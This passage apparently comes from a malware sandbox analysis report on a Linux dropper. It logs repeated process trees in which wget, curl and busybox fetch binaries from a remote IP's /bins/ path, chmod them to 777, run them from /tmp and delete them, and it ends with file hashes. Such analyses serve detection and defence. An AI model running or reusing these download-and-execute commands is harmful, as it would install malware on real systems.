/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:932
-
-
/bin/chmodchmod 777 rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- File and Directory Permissions Modification
PID:933
-
-
/tmp/rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR./rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵
- Executes dropped EXE
PID:934
-
-
/bin/rmrm rov6CYjwcsQYSX8e26NXgWcPZJCw68WNQR2⤵PID:935
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:936
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:937
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH88./P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:940
-
-
/bin/rmrm P0iZEipCOQ5oJiUBcLP8VFbxYUre9htH882⤵
- System Network Configuration Discovery
PID:941
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:942
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:944
-
-
/bin/chmodchmod 777 wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- File and Directory Permissions Modification
PID:945
-
-
/tmp/wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi./wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵
- Executes dropped EXE
PID:946
-
-
/bin/rmrm wm8EtAvUgm5lSDDLnowje4xppmSa4YYQCi2⤵PID:947
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:948
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:949
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:950
-
-
/bin/chmodchmod 777 ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- File and Directory Permissions Modification
PID:951
-
-
/tmp/ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY./ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵
- Executes dropped EXE
PID:952
-
-
/bin/rmrm ZsYyjSbtmKcFjw87dnIby7cezOe7xjiVeY2⤵PID:953
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:954
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Reads runtime system information
- Writes file to tmp directory
PID:955
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:956
-
-
/bin/chmodchmod 777 Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- File and Directory Permissions Modification
PID:957
-
-
/tmp/Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp90./Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵
- Executes dropped EXE
PID:958
-
-
/bin/rmrm Gqu0emuKlxlcdMlG1VQ7ZjFPxUcVovTp902⤵PID:959
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:960
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Reads runtime system information
- Writes file to tmp directory
PID:961
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:962
-
-
/bin/chmodchmod 777 Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- File and Directory Permissions Modification
PID:963
-
-
/tmp/Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR8./Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵
- Executes dropped EXE
PID:964
-
-
/bin/rmrm Sx5R3xNdvpDSZf9yxVZbxW88GxIVrqsQR82⤵PID:965
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:966
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:967
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:968
-
-
/bin/chmodchmod 777 lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- File and Directory Permissions Modification
PID:969
-
-
/tmp/lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu./lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵
- Executes dropped EXE
PID:970
-
-
/bin/rmrm lFJzR6hmq4a4xs66nSqRhzVp4NUQNjQvcu2⤵PID:971
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:972
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Reads runtime system information
- Writes file to tmp directory
PID:973
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:974
-
-
/bin/chmodchmod 777 sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- File and Directory Permissions Modification
PID:975
-
-
/tmp/sgAW8gTvfedveDVZi11XW1pkq2gx7igga6./sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵
- Executes dropped EXE
PID:976
-
-
/bin/rmrm sgAW8gTvfedveDVZi11XW1pkq2gx7igga62⤵PID:977
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97